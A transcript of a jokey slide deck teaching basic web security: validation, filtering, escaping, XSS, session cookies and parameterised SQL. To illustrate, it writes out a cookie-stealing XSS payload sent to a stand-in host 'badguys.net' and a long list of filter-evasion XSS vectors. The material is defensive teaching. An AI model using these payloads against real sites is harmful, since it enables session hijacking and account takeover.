Basic Web Application Security. User Input Kick Your Arse.
-
date post
22-Dec-2015 -
Category
Documents
-
view
218 -
download
0
Transcript of Basic Web Application Security. User Input Kick Your Arse.
Basic WebApplication
Security
User Input
Kick Your Arse
Three Ways(All Awesome)
Validation
Passive(No touchy-touchy)
This is a Number.
2
This is not a Number.
a
This is really not a Number.
<script>alert(‘loldongs’)</script>
Filtering
Destructive(One-Way Street)
Only letting the good stuff in.
or
Keeping out the bad stuff.
What’s the diff?(Bro.)
Both can be error-prone...
White-Listing Usability Problems
What happens whenyou screw it up?
Black-Listing Security Problems
(Always a trade-off.)
Escaping
TransportPoint A Point B
Data will be the same on both
sides.
Different Media,Different Escaping
HTML
<b>Huh.</b>
<p><i><b>Huh.</b></i></p>
<b>Huh</b>
SQL
Sam O’Brien
INSERT INTO mah_peeps (name)VALUES (‘Sam O\’Brien‘);
1, Sam O’Brien, 2010-09-02 18:30:00
XSS(Cross-Site Scripting)
(XTREME Site Scripting)
SS
Sticking Scripts Where They
Don’t Belong.You there, down the back.
Stop sniggering.
<script>alert(‘HACKED BY LOLDONGS’)
</script>
Amateurs!
<script>alert(document.cookie)
</script>
Hmm.
<script>document.write(‘<img
src=“http://badguys.net/logthis.php?d=‘+document.cookie+’”
style=“display:none;”>’);</script>
Oh shit.
Why is this uncool?
(Yeah! Why?)
<script>document.write(‘<img
src=“http://badguys.net/logthis.php?d=‘+document.cookie+’”
style=“display:none;”>’);</script>
Ooooh shit.
<script>document.write(‘<img
src=“http://badguys.net/logthis.php?d=‘+document.cookie+’”
style=“display:none;”>’);</script>
Oooooooooooh shit.
<script>document.write(‘<img
src=“http://badguys.net/logthis.php?d=‘+document.cookie+’”
style=“display:none;”>’);</script>
Oooooooooooooooooh shit.
Why is this really uncool?
(Because shut up.)
HTTP
Hyper-Text Thingy I-forgot-again
Stateless
No Idea Who You Are.
It can guess.(Badly.)
IP AddressBrowser User-Agent
Sends a cookie with each request.
(A basket of goodies that the browser sends faithfully every
request.)
The Server puts a unique ID in
the basket.PHPSESSID=123your456mum
789__utma=12948.23.4211414.5
553is_a_furry=1
Browser sends the ID every
request.
PHPSESSID=123your456mum789
<script>document.write(‘<img
src=“http://badguys.net/logthis.php?d=‘+document.cookie+’”
style=“display:none;”>’);</script>
Look again.
THEY HAVE YOUR COOKIE.
Ooooooooooooooooooooooo-
Preventing Shenanigans
HTML
Validation Really Hard.
HTML
Filtering Still Really Hard.
Use a library, eg. HTML Purifier.
HTML
Escaping Dead Easy.
Most languages have stuff to handle this, eg.
htmlentities(), cgi.escape(), CGI.escape()
How hard is filtering?
(It’s just <script>, right?)
THIS HARD.
<IMG SRC=javascript:alert('a')>
<img src=javascript:alert("a")>
<img “””><script>alert('a')</script>”>
<IMG
SRC=javascr
ipt:ale
4;
t('XSS')>
<IMG
SRC=javascr
ipt:aler
t('XSS')>
<IMG SRC="jav ascript:alert('a');“>
(Well, then.)
<IMG SRC="jav	asœript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<SCR\0IPT>alert('a')</SCR\0IPT>
<SCRIPT/a SRC="http://foo/x.js"></SCRIPT>
<img onmouseover!#$%&=alert('a')>
<<SCRIPT>alert("a");//<</SCRIPT>
<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>
<SC\0RIPT SRC=http://foo/x.js?<B>
<script src=//foo/x.js>
<img src=”javascript:alert('a')”
THIS HARD.
<iframe src=http://foo/x.html <
<body background=”javascript:alert('a')”>
<BODY ONLOAD=alert('a')>
<img dynsrc=”javascript:alert('a')”>
<img lowsrc=”javascript:alert('a')”>
<BGSOUND SRC=javascript:alert('a')>
<BR SIZE=”&{alert('a')}”>
<LAYER SRC=”http://foo/x.html”></LAYER>
<link rel=”stylesheet” href=”javascript:alert('a');”>
<XSS STYLE="behavior: url(xss.htc);">
<STYLE>BODY{-moz-binding:url("http://foo/
x.xml#xss")}</STYLE>
(Well, then.)
<IMG SRC='vbscript:msgbox(“a”)'>
<img src=”livescript:alert('a')”>
žscriptualert(EXSSE)ž/scriptu (US-ASCII encoding evasion)
<META HTTP-EQUIV=”refresh”
CONTENT=”0;url=javascript:alert('a');”>
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,
PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<FRAMESET><FRAME
SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
THIS HARD.<DIV STYLE="background-image:
url(javascript:alert('a'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\
006a
\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\
0061
\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\
0029">
<DIV STYLE="background-image:
url(javascript:alert('a'))">
<DIV STYLE="width: expression(alert('a'));">
<STYLE>@im\port'\ja\vasc\ript:alert("a")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('a'))">
exp/*<A
STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/
*/pression(alert("a"))'>
<STYLE TYPE="text/javascript">alert('a');</STYLE>
(Well, then.)
<STYLE>.x{background-
image:url("javascript:alert('a')");}</STYLE><A
CLASS=X></A>
<BASE HREF="javascript:alert('a');//">
<OBJECT TYPE="text/x-scriptlet"
DATA="http://foo/x.html"></OBJECT>
<EMBED SRC="http://foo/xss.swf"
AllowScriptAccess="always"></EMBED>
<EMBED
SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzd
....jwvc3ZnPg=="
type="image/svg+xml"
AllowScriptAccess="always"></EMBED>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><!
[CDATA[cript:alert('XSS');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML></SPAN>
One more thing about XSS.
(Groan.)
Remember <script>alert()</script>
?
(Yes, I do. Shut up.)
alert() can be ANY JAVASCRIPT.
(Yes, and...?)
Do you have any forms on your page?
(Yes.)
Do you have any javascript functions your site uses to do anything
useful?
(... Yes.)
Do your site make any AJAX calls to do anything useful?
(... Oh.)
That injected code can trigger forms, run
javascript functions, or make AJAX calls.
(... Oooooh.)
Send someone to a link that looks like:
http://my.site/?user=<script>doStuff();</script>
(... Oooooooooh.)
Or store something that will output this on someone’s profile
page:
<script>doStuff();</script>
(... Oooooooooooooooh.)
... And you’re hosed.
(Shit.)
The Human Element
Touchy-Feely Commie Bullshit.
We are very fallible.
We will forget things.
When time gets short, we take the easy path.
Design systems so that they naturally
encourage security.
SQL
Insert(“INSERT INTOposts VALUES
(‘”.sql_safe($title).”’, ‘“.sql_safe($content).”’,
‘”.sql_safe($author).”’)”);
SQL
or
SQL
insert(“INSERT INTOposts VALUES
(:title, :content, :author)”,$title, $content, $author);
HTML
<h3><%= title %> - <%= date %><h3><div><%= raw(post_body) %></div><p>Written by <%= author %></p>
HTML
or
HTML
<h3><?=htmlentities($title);?> - <?=htmlentities(date);?><h3>
<div><?=$post_body;?></div><p>Written by <?
=htmlentities($author);?></p>
Questions?
Now get out.